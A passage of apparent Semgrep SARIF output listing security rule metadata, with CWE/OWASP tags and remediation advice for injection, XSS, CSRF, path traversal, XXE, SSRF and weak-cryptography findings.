MessageDigest.getInstance(\"SHA256\");"},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crypto.ssl.avoid-implementing-custom-digests.avoid-implementing-custom-digests","id":"java.lang.security.audit.crypto.ssl.avoid-implementing-custom-digests.avoid-implementing-custom-digests","name":"java.lang.security.audit.crypto.ssl.avoid-implementing-custom-digests.avoid-implementing-custom-digests","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crypto.ssl.avoid-implementing-custom-digests.avoid-implementing-custom-digests"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"'html_safe()' does not make the supplied string safe. 'html_safe()' bypasses HTML escaping. If external data can reach here, this exposes your application to cross-site scripting (XSS) attacks. Ensure no external data reaches here."},"help":{"markdown":"'html_safe()' does not make the supplied string safe. 'html_safe()' bypasses HTML escaping. If external data can reach here, this exposes your application to cross-site scripting (XSS) attacks. Ensure no external data reaches here.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-html-safe.avoid-html-safe)\n - [https://github.com/presidentbeef/brakeman/blob/main/docs/warning_types/cross_site_scripting/index.markdown](https://github.com/presidentbeef/brakeman/blob/main/docs/warning_types/cross_site_scripting/index.markdown)\n - [https://www.netsparker.com/blog/web-security/preventing-xss-ruby-on-rails-web-applications/](https://www.netsparker.com/blog/web-security/preventing-xss-ruby-on-rails-web-applications/)\n","text":"'html_safe()' does not make the supplied string safe. 'html_safe()' bypasses HTML escaping. If external data can reach here, this exposes your application to cross-site scripting (XSS) attacks. Ensure no external data reaches here."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-html-safe.avoid-html-safe","id":"ruby.rails.security.audit.xss.avoid-html-safe.avoid-html-safe","name":"ruby.rails.security.audit.xss.avoid-html-safe.avoid-html-safe","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.xss.avoid-html-safe.avoid-html-safe"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application does not appear to verify inbound requests which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. To prevent this vulnerability start by identifying if the framework or library leveraged has built-in features or offers plugins for CSRF protection. CSRF tokens should be unique and securely random. The `Synchronizer Token` or `Double Submit Cookie` patterns with defense-in-depth mechanisms such as the `sameSite` cookie flag can help prevent CSRF. For more information, see: [Cross-site request forgery prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)"},"help":{"markdown":"The application does not appear to verify inbound requests which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. To prevent this vulnerability start by identifying if the framework or library leveraged has built-in features or offers plugins for CSRF protection. CSRF tokens should be unique and securely random. The `Synchronizer Token` or `Double Submit Cookie` patterns with defense-in-depth mechanisms such as the `sameSite` cookie flag can help prevent CSRF. For more information, see: [Cross-site request forgery prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.net.csrf.gorilla-csrf.go-net-http-route-without-gorilla-csrf-protection.go-net-http-route-without-gorilla-csrf-protection)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)\n - [https://github.com/gorilla/csrf](https://github.com/gorilla/csrf)\n","text":"The application does not appear to verify inbound requests which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. To prevent this vulnerability start by identifying if the framework or library leveraged has built-in features or offers plugins for CSRF protection. CSRF tokens should be unique and securely random. The `Synchronizer Token` or `Double Submit Cookie` patterns with defense-in-depth mechanisms such as the `sameSite` cookie flag can help prevent CSRF. For more information, see: [Cross-site request forgery prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)"},"helpUri":"https://semgrep.dev/r/go.net.csrf.gorilla-csrf.go-net-http-route-without-gorilla-csrf-protection.go-net-http-route-without-gorilla-csrf-protection","id":"go.net.csrf.gorilla-csrf.go-net-http-route-without-gorilla-csrf-protection.go-net-http-route-without-gorilla-csrf-protection","name":"go.net.csrf.gorilla-csrf.go-net-http-route-without-gorilla-csrf-protection.go-net-http-route-without-gorilla-csrf-protection","properties":{"precision":"very-high","tags":["CWE-352: Cross-Site Request Forgery (CSRF)","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: go.net.csrf.gorilla-csrf.go-net-http-route-without-gorilla-csrf-protection.go-net-http-route-without-gorilla-csrf-protection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.file.tainted-path-traversal-toml-django.tainted-path-traversal-toml-django)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://www.stackhawk.com/blog/django-path-traversal-guide-examples-and-prevention/](https://www.stackhawk.com/blog/django-path-traversal-guide-examples-and-prevention/)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"helpUri":"https://semgrep.dev/r/python.django.file.tainted-path-traversal-toml-django.tainted-path-traversal-toml-django","id":"python.django.file.tainted-path-traversal-toml-django.tainted-path-traversal-toml-django","name":"python.django.file.tainted-path-traversal-toml-django.tainted-path-traversal-toml-django","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.file.tainted-path-traversal-toml-django.tainted-path-traversal-toml-django"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.spring-sqli-deepsemgrep.spring-sqli-deepsemgrep)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables."},"helpUri":"https://semgrep.dev/r/java.spring.security.spring-sqli-deepsemgrep.spring-sqli-deepsemgrep","id":"java.spring.security.spring-sqli-deepsemgrep.spring-sqli-deepsemgrep","name":"java.spring.security.spring-sqli-deepsemgrep.spring-sqli-deepsemgrep","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.spring-sqli-deepsemgrep.spring-sqli-deepsemgrep"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user data flowing into exec. This is code injection and should be avoided."},"help":{"markdown":"Detected user data flowing into exec. This is code injection and should be avoided.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.security.injection.user-exec.exec-injection)\n - [https://nedbatchelder.com/blog/201206/exec_really_is_dangerous.html](https://nedbatchelder.com/blog/201206/exec_really_is_dangerous.html)\n","text":"Detected user data flowing into exec. This is code injection and should be avoided."},"helpUri":"https://semgrep.dev/r/python.flask.security.injection.user-exec.exec-injection","id":"python.flask.security.injection.user-exec.exec-injection","name":"python.flask.security.injection.user-exec.exec-injection","properties":{"precision":"very-high","tags":["CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.security.injection.user-exec.exec-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for requests to http (unencrypted) sites using grequests, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network."},"help":{"markdown":"Checks for requests to http (unencrypted) sites using grequests, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.grequests-http-request.grequests-http-request)\n - [https://godoc.org/github.com/levigross/grequests#DoRegularRequest](https://godoc.org/github.com/levigross/grequests#DoRegularRequest)\n - [https://github.com/levigross/grequests](https://github.com/levigross/grequests)\n","text":"Checks for requests to http (unencrypted) sites using grequests, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.grequests-http-request.grequests-http-request","id":"problem-based-packs.insecure-transport.go-stdlib.grequests-http-request.grequests-http-request","name":"problem-based-packs.insecure-transport.go-stdlib.grequests-http-request.grequests-http-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.go-stdlib.grequests-http-request.grequests-http-request"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.hyper.sql.sqlx-taint.sqlx-taint)\n - [https://docs.rs/sqlx/latest/sqlx/](https://docs.rs/sqlx/latest/sqlx/)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/rust.hyper.sql.sqlx-taint.sqlx-taint","id":"rust.hyper.sql.sqlx-taint.sqlx-taint","name":"rust.hyper.sql.sqlx-taint.sqlx-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: rust.hyper.sql.sqlx-taint.sqlx-taint"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found a formatted template string passed to 'template.JS()'. 'template.JS()' does not escape contents. Be absolutely sure there is no user-controlled data in this template."},"help":{"markdown":"Found a formatted template string passed to 'template.JS()'. 'template.JS()' does not escape contents. Be absolutely sure there is no user-controlled data in this template.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.net.unescaped-data-in-js.unescaped-data-in-js)\n - [https://golang.org/pkg/html/template/#JS](https://golang.org/pkg/html/template/#JS)\n","text":"Found a formatted template string passed to 'template.JS()'. 'template.JS()' does not escape contents. Be absolutely sure there is no user-controlled data in this template."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.net.unescaped-data-in-js.unescaped-data-in-js","id":"go.lang.security.audit.net.unescaped-data-in-js.unescaped-data-in-js","name":"go.lang.security.audit.net.unescaped-data-in-js.unescaped-data-in-js","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.net.unescaped-data-in-js.unescaped-data-in-js"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"You are using an insecure random number generator (RNG) to create a cryptographic key. System.Random must never be used for cryptographic purposes. Use System.Security.Cryptography.RandomNumberGenerator instead."},"help":{"markdown":"You are using an insecure random number generator (RNG) to create a cryptographic key. System.Random must never be used for cryptographic purposes. Use System.Security.Cryptography.RandomNumberGenerator instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.security.use_weak_rng_for_keygeneration.use_weak_rng_for_keygeneration)\n - [https://learn.microsoft.com/en-us/dotnet/api/system.random?view=net-6.0#remarks](https://learn.microsoft.com/en-us/dotnet/api/system.random?view=net-6.0#remarks)\n - [https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography.randomnumbergenerator?view=net-6.0](https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography.randomnumbergenerator?view=net-6.0)\n - [https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography.aesgcm?view=net-6.0#constructors](https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography.aesgcm?view=net-6.0#constructors)\n - [https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography.symmetricalgorithm.key?view=net-6.0#system-security-cryptography-symmetricalgorithm-key](https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography.symmetricalgorithm.key?view=net-6.0#system-security-cryptography-symmetricalgorithm-key)\n","text":"You are using an insecure random number generator (RNG) to create a cryptographic key. System.Random must never be used for cryptographic purposes. Use System.Security.Cryptography.RandomNumberGenerator instead."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.security.use_weak_rng_for_keygeneration.use_weak_rng_for_keygeneration","id":"csharp.dotnet.security.use_weak_rng_for_keygeneration.use_weak_rng_for_keygeneration","name":"csharp.dotnet.security.use_weak_rng_for_keygeneration.use_weak_rng_for_keygeneration","properties":{"precision":"very-high","tags":["CWE-338: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.security.use_weak_rng_for_keygeneration.use_weak_rng_for_keygeneration"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.secrets.gorm.gorm-empty-password.gorm-empty-password)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/go.secrets.gorm.gorm-empty-password.gorm-empty-password","id":"go.secrets.gorm.gorm-empty-password.gorm-empty-password","name":"go.secrets.gorm.gorm-empty-password.gorm-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.secrets.gorm.gorm-empty-password.gorm-empty-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.file.tainted-pickleshare-django.tainted-pickleshare-django)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://www.stackhawk.com/blog/django-path-traversal-guide-examples-and-prevention/](https://www.stackhawk.com/blog/django-path-traversal-guide-examples-and-prevention/)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"helpUri":"https://semgrep.dev/r/python.django.file.tainted-pickleshare-django.tainted-pickleshare-django","id":"python.django.file.tainted-pickleshare-django.tainted-pickleshare-django","name":"python.django.file.tainted-pickleshare-django.tainted-pickleshare-django","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.file.tainted-pickleshare-django.tainted-pickleshare-django"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Make sure that unverified user data can not reach the XML Parser, as it can result in XML External or Internal Entity (XXE) Processing vulnerabilities"},"help":{"markdown":"Make sure that unverified user data can not reach the XML Parser, as it can result in XML External or Internal Entity (XXE) Processing vulnerabilities\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.express-xml2json-xxe.express-xml2json-xxe)\n - [https://www.npmjs.com/package/xml2json](https://www.npmjs.com/package/xml2json)\n","text":"Make sure that unverified user data can not reach the XML Parser, as it can result in XML External or Internal Entity (XXE) Processing vulnerabilities"},"helpUri":"https://semgrep.dev/r/javascript.express.security.express-xml2json-xxe.express-xml2json-xxe","id":"javascript.express.security.express-xml2json-xxe.express-xml2json-xxe","name":"javascript.express.security.express-xml2json-xxe.express-xml2json-xxe","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.express-xml2json-xxe.express-xml2json-xxe"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The string returned from `std::string_view.data()` is not guaranteed to be NULL terminated. This expression expects a NULL terminated string and will trigger an out-of-bounds read."},"help":{"markdown":"The string returned from `std::string_view.data()` is not guaranteed to be NULL terminated. This expression expects a NULL terminated string and will trigger an out-of-bounds read.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.strings.string-view-data-null-terminator.string-view-data-null-terminator)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR32-C.+Do+not+pass+a+non-null-terminated+character+sequence+to+a+library+function+that+expects+a+string](https://wiki.sei.cmu.edu/confluence/display/c/STR32-C.+Do+not+pass+a+non-null-terminated+character+sequence+to+a+library+function+that+expects+a+string)\n","text":"The string returned from `std::string_view.data()` is not guaranteed to be NULL terminated. This expression expects a NULL terminated string and will trigger an out-of-bounds read."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.strings.string-view-data-null-terminator.string-view-data-null-terminator","id":"cpp.lang.security.strings.string-view-data-null-terminator.string-view-data-null-terminator","name":"cpp.lang.security.strings.string-view-data-null-terminator.string-view-data-null-terminator","properties":{"precision":"very-high","tags":["CWE-125: Out-of-bounds Read","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.strings.string-view-data-null-terminator.string-view-data-null-terminator"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.xxe.saxparserfactory-xxe.saxparserfactory-xxe)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.lang.security.xxe.saxparserfactory-xxe.saxparserfactory-xxe","id":"java.lang.security.xxe.saxparserfactory-xxe.saxparserfactory-xxe","name":"java.lang.security.xxe.saxparserfactory-xxe.saxparserfactory-xxe","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.xxe.saxparserfactory-xxe.saxparserfactory-xxe"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The following request $REQUEST.$METHOD() was found to be crafted from user-input `$REQ` which can lead to Server-Side Request Forgery (SSRF) vulnerabilities. It is recommended where possible to not allow user-input to craft the base request, but to be treated as part of the path or query parameter. When user-input is necessary to craft the request, it is recommeneded to follow OWASP best practices to prevent abuse. "},"help":{"markdown":"The following request $REQUEST.$METHOD() was found to be crafted from user-input `$REQ` which can lead to Server-Side Request Forgery (SSRF) vulnerabilities. It is recommended where possible to not allow user-input to craft the base request, but to be treated as part of the path or query parameter. When user-input is necessary to craft the request, it is recommeneded to follow OWASP best practices to prevent abuse. \n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.audit.express-ssrf.express-ssrf)\n - 